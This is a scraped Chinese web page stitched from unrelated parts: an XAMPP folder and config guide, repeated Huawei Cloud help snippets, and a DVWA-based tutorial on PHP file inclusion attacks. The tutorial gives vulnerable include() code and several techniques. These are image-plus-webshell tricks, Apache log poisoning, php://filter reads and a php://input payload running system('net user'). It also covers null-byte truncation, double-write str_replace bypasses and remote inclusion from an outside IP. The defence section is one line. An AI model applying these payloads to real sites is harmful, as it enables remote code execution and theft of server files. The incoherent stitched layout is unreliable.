Xampp 是一个软件包。功能全面(Apache、Mysql、php、Perl)，一下是工作中对这些文件的说明，方便大家配置调试。
 
基本的软件包：
 
Apache，著名的 Web 服务器
 
MySQL，一种杰出、免费的开源数据库
 
PHP，一种编程语言
 
Perl，一种编程语言
 
ProFTPD，一个 FTP 服务器
 
OpenSSL，可以支持安全套接字层
 
路径                    内容
 
xamppanonymous 匿名 FTP 的样例文件夹
 
xamppapache         Apache 服务器
 
xamppcgi-bin           可执行的 CGI 脚本
 
xamppFileZillaFTP FileZilla FTP 服务器
 
xampphtdocs           http 文档的主文件夹
 
xamppinstall             用于 XAMPP 的安装(请勿删除！)
 
xampplicenses        同上
 
xamppMercuryMail       Mercury 邮件 SMTP POP3 IMAP 服务器
 
xamppmysql            MySQL 服务器
 
xamppperl                Perl
 
xamppphp                PHP(4 和 5)
 
xamppphpmyadmin       phpMyAdmin
 
xamppsecurity        额外的安全配置
 
xampptmp                临时文件夹
 
xamppwebalizer      Webalizer 网络状态
 
xamppwebdav                WebDAV 样例
 
* Apache 基本配置：.xamppapacheconfhttpd.conf
 
* Apache SSL：.xamppapacheconfssl.conf
 
* Apache Perl(仅限插件)：.xamppapacheconfperl.conf
 
* Apache Tomcat(仅限插件)：.xamppapacheconfjava.conf
 
* Apache Python(仅限插件)：.xamppapacheconfpython.conf
 
* PHP：.xamppphpphp.ini
 
* MySQL：.xamppmysqlbinmy.ini
 
* phpMyAdmin：.xamppphpMyAdminconfig.inc.php
 
* FileZilla FTP 服务器：.xamppFileZillaFTPFileZilla Server.xml
 
* Mercury 邮件服务器基本配置：.xamppMercuryMailMERCURY.INI
 
* Sendmail：.xamppsendmailsendmail.ini

删掉xampp文件夹时，提示：操作无法完成,因为其中的文件夹或文件已在另一程序中打开
 
具体的解决方法：
 开始菜单-管理工具-服务
 找到apachezt和mysqlzt，并禁用 – 因为之前打开Zentao时已经启用apache和mysql服务
 重启电脑
 删除xampp文件夹成功

 
云服务器搭建xampp 内容精选
 
换一换
 

 
Discuz!论坛是全球成熟度最高、覆盖率最大的论坛软件系统之一。用户对论坛的访问可分为高峰期和平峰期，若论坛采用多服务器部署模式且满足高峰时期的负载需求，平峰期必有部分服务器处于闲置状态，增加了不必要的成本，也造成了资源浪费。弹性伸缩可帮助您解决以上问题。当您在论坛的服务器系统中应用弹性伸缩后，弹性伸缩可以根据您设定的策略，自动地增加或
 
华为云帮助中心，为用户提供产品简介、价格说明、购买指南、用户指南、API参考、最佳实践、常见问题、视频帮助等技术文档，帮助您快速上手使用华为云服务。
 
云服务器搭建xampp 相关内容
 
云服务器组是对云服务器的一种逻辑划分，云服务器组中的弹性云服务器遵从同一策略。当前仅支持反亲和性，即同一云服务器组中的弹性云服务器分散地创建在不同的主机上，提高业务的可靠性。您可以使用云服务器组将业务涉及到的云服务器分散部署在不同的物理服务器上，以此保证业务的高可用性和底层容灾能力。云服务器组支持以下操作：创建云服务器组添加云服务器到云服
 
介绍常见的安全组配置示例。如下示例中，出方向默认全通，仅介绍入方向规则配置方法。不同安全组内的云耀云服务器内网互通仅允许特定 IP 地址远程连接云耀云服务器SSH远程连接Linux云耀云服务器RDP远程连接Windows云服务器公网ping云耀云服务器云耀云服务器作Web服务器云耀云服务器作DNS服务器使用FTP上传或下载文件场景举例：在
 
云服务器搭建xampp 更多内容
 

 
购买服务及配置特性时，操作步骤中未框选的配置项请保持默认值。申请服务时，未开通企业管理的用户页面无“企业项目”参数项，无需进行配置。如需开通企业项目，请参考如何开通企业项目/企业多账号。选择“网络 > 虚拟私有云”，单击“创建虚拟私有云”。设置相关参数并完成创建。安全组下默认的规则不能被删除，否则将导致两个服务器彼此通信异常。选择“计算
 

 
是的。直接将共享云硬盘挂载给多台云服务器无法实现文件共享功能。云服务器之间没有相互约定读写数据的规则，将会导致这些云服务器读写数据时相互干扰或者出现其他不可预知的错误。共享云硬盘本身并不具备集群管理能力，因此需要自行搭建集群系统来实现数据共享，如企业应用中常见的Windows MSCS集群、Veritas VCS集群和CFS集群等。
 

 
实例即云耀云服务器，是由CPU、内存、操作系统、云硬盘组成的基础的计算组件。云耀云服务器创建成功后，您就可以像使用自己的本地PC或物理服务器一样，在云上使用云耀云服务器，打造一个高效、可靠、安全的计算环境。云耀云服务器的开通是自助完成的，您只需要指定镜像、配置(包括CPU、内存)即可。在云耀云服务器的使用过程中，也可以根据您的需求随时调整
 

 
在云服务器上搭建网站后，部分客户通过本地网络访问网站时出现偶发性无法访问的情况。确认客户使用的本地网络。若客户的本地网络是NAT网络(本地主机通过NAT功能使用公网IP地址访问弹性云服务器)，可能会导致该问题。若客户的本地网络是NAT网络(本地主机通过NAT功能使用公网IP地址访问弹性云服务器)，可能会导致该问题。执行以下命令，查看搭建网
 

 
在云服务器上搭建网站后，部分客户通过本地网络访问网站时出现偶发性无法访问的情况。确认客户使用的本地网络。若客户的本地网络是NAT网络(本地主机通过NAT功能使用公网IP地址访问弹性云服务器)，可能会导致该问题。若客户的本地网络是NAT网络(本地主机通过NAT功能使用公网IP地址访问弹性云服务器)，可能会导致该问题。执行以下命令，查看搭建网
 

 
在使用云服务器备份制作的整机镜像创建弹性云服务器时，创建速度很慢，或者界面提示用户：该镜像不支持快速创建云服务器功能。CSBS服务早期提供的老备份格式无法支持快速创建云服务器，因此，如果您的整机镜像是通过老备份格式制作的，则该整机镜像不支持快速创建弹性云服务器功能。CSBS服务当前已支持新的备份格式，通过新的备份格式制作的整机镜像不再存在
 

 
介绍常见的安全组配置示例。如下示例中，出方向默认全通，仅介绍入方向规则配置方法。不同安全组内的弹性云服务器内网互通仅允许特定IP地址远程连接弹性云服务器SSH远程连接Linux弹性云服务器RDP远程连接Windows弹性云服务器公网ping ECS弹性云服务器弹性云服务器作Web服务器弹性云服务器作DNS服务器使用FTP上传或下载文件场景
 

 
如果您需要使用创建的云服务器搭建一个对外展示的网站或者Web应用程序，请按以下步骤进行相关的配置操作。建站参考如果您使用的是公共镜像创建的云服务器，那么购买完成后可以参考以下建站指导完成完网站或应用程序的搭建。搭建WordPress博客平台，请参考部署WordPress博客系统搭建Discuz论坛平台，请参考搭建Discuz 论坛网站。更
 

 
用户申请创建弹性云服务器后，可以查看任务的创建状态。本节介绍如何查看弹性云服务器的创建状态。登录管理控制台。单击管理控制台左上角的，选择区域和项目。选择“计算 > 弹性云服务器”。常用操作“开机/关机/重置密码/更多”的右侧即为创建状态栏，用户执行购买弹性云服务器操作后，创建状态栏将显示该任务为“创建中”状态。单击“创建中”对应的数字，即
 

 
华为云帮助中心，为用户提供产品简介、价格说明、购买指南、用户指南、API参考、最佳实践、常见问题、视频帮助等技术文档，帮助您快速上手使用华为云服务。
 

 
WordPress是使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上搭建属于自己的网站，本文教您通过华为云虚拟私有云、弹性云服务器和RDS MySQL数据库，轻松几步，在LAMP环境下搭建WordPress。设置网络购买弹性云服务器搭建LAMP环境购买并配置RDS安装WordPress在搭建过程中，您会使用以

 

 

  
 
 
 简单一句话，为了更好地使用代码的重用性，引入了文件包含函数，可以通过文件包含函数将文件包含进来，直接使用包含文件的代码。在大多数Web语言中都会提供的功能，但PHP对于包含文件所提供的功能太强大，太灵活，所以包含漏洞经常出现在PHP语言中，这也就导致了出现了一个错误现状，很多初学者认为包含漏洞只出现PHP语言之中，殊不知在其他语言中可能出现包含漏洞。这也应了一句老话:功能越强大，漏洞就越多。
 文件包含漏洞的原理：
 
 大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现安全问题。 但是，有些时候，文件包含的代码文件被写成了一个变量，且这个变量可以由前端用户传进来，这种情况下，如果没有做足够的安全考虑，则可能会引发文件包含漏洞。攻击着会指定一个“意想不到”的文件让包含函数去执行，从而造成恶意操作。 
 
 示例代码：
 <?php
 
 $filename = $_GET['filename'];
 
 include($filename);
 
 ?>
 
 典型特征
 ?page=a.php 
 ?home=b.html 
 ?file=content…
 涉及到的危险函数：
 
 include函数： 执行到include时才包含文件，找不到被包含文件时只会产生警告，脚本将继续执行 require函数：只要程序一运行就包含文件，找不到被包含的文件时会产生致命错误，并停止脚本
 
 include_once 函数：在脚本执行期间包含并运行指定文件。此行为和 include 语句类似，唯一区别是如果该文件中已经被包含过，则不会再次包含。如同此语句名字暗示的那样，只会包含一次；
 
 require_once 函数：和 require 语句完全相同，唯一区别是 PHP 会检查该文件是否已经被包含过，如果是则不会再次包含。
 文件包含漏洞的分类：
 
1、本地文件包含漏洞：仅能够对服务器本地的文件进行包含，由于服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些 固定的系统配置文件，从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。
 
2、远程文件包含漏洞：
 
 能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。
 
 需要设置 PHPstudy 的参数开关设置 
 allow_url_include=on 
 magic_quotes_gpc=off
 文件包含漏洞的上传技巧：
 
1、小马+图片：
 
方法一：直接伪造头部GIF89Ar方法二：CMD方法，copy /b test.png+1.php muma.png
 
方法三：直接使用工具增加备注写入一句话木马。
2、小马+日志：
 
 当某个PHP文件存在本地包含漏洞，而却无法上传正常文件，这就意味这有包含漏洞却不能拿来利用，这时攻击者就有可能会利用apache日志文件来入侵。
 
 Apache服务器运行后会生成两个日志文件，这两个文件是access.log(访问日志)和error.log(错误日志)，apache的日志文件记录下我们的操作，并且写到访问日志文件access.log之中
 
1、打开配置文件-httpd-conf”,打开httpd.conf配置文件,第299行 ##CustomLog "logs/access.log" common，将##删除
 

 

  
 
 
2、将一句话木马写到 fiename 里，虽然会提示失败，但是会记录到日志文件中。
 

 

  
 
 

 

  
 
 
3、然后将日志的路径包含在 fiename 里，此时小马就被运行了，但是由于编码的缘故有可能并不生效。
 

 

  
 
 
 日志默认路径：
 
(1) apache+Linux 日志默认路径
/etc/httpd/logs/access_log 或者/var/log/httpd/access_log 
 
(2) apache+win2003 日志默认路径 
D:xamppapachelogsaccess.log 
D:xamppapachelogserror.log 
 
(3) IIS6.0+win2003 默认日志文件 
C:WINDOWSsystem32Logfiles(4) IIS7.0+win2003 默认日志文件 
%SystemDrive%inetpublogsLogFiles
 
(5) nginx 日志文件 
 
 日志文件在用户安装目录 logs 目录下
 以我的安装路径为例/usr/local/nginx,那我的日志目录就是在/usr/local/nginx/logs里3、php包含读文件： 构造URL: 
 
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
 
1、访问URL,得到经过base64加密后的字符串:
 

 

  
 
 
2、经解密还原得到如下：
 

 

  
 
 
4、php包含写文件： 构造URL: http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input,并且提交post数据为:<?php system('net user');?>
 
⛔注意:只有在allow _url_include为on的时候才可以使用,如果想查看回显结果那必须在C:phpphp-5.2.14-Win32下找到php-apache2handler.ini打开，查找display_funtions=proc-open,oppen,exec,system…….删掉system重启apache。
 

 

  
 
 

5、包含截断绕过：（低） 如下代码，在上传的文件后面加.php后缀，默认是PHP文件，但我们上传的文件肯定不是PHP文件。
<?php
 if(isset($_GET['page'])){
 include $_GET['page'] .".php" ;
 }else{
 include 'home.php';
 }
 ?>
 
⛔这种方法只适合于magic_quotes_gpc=off的时候， php版本小于5.3.4
 
 可通过%00截断绕过，不过现在已经很难见到了，比如：index.php?file=info.txt//…………超过一定数据的/。
 
6、str_replace函数绕过：（中） 使用str_replace函数是极其不安全的，因为可以使用双写绕过替换规则。
 例如：page=hthttp://tp://192.168.0.103/phpinfo.txt时，str_replace函数会将http://删除，于是page=http://192.168.0.103/phpinfo.txt，成功执行远程命令。
 
⛔因为替换的只是“../”、“..”，所以对采用绝对路径的方式包含文件是不会受到任何限制的。
 
1、本地文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=..././..././..././..././..././xampp/htdocs/dvwa/php.ini
 
2、绝对路径不受任何影响http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
 
3、远程文件包含http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt
7、fnmatch函数绕过：（高）
 
 if(!fnmatch("file*",$file)&&$file!="include.php"),当文件既不是"include.php"也不是"file*"（文件名file开头）时才抛出错误，反之意思，如果文件名符合其中一个条件既可以。
 构造URL：http://192.168.0.103/dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini
 
⛔page=file:///C:/xampp/htdocs/dvwa/php.ini 刚好满足"file*"（文件名file开头）所以成功读取了服务器的配置文件。
 
 PHP带有很多内置URL风格的封装协议，可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。 具体协议请参照http://www.php.net/manual/zh/wrappers.php。
 

 

  
 
 
 文件包含漏洞的防御方法：
 
 将需要包含的文件写死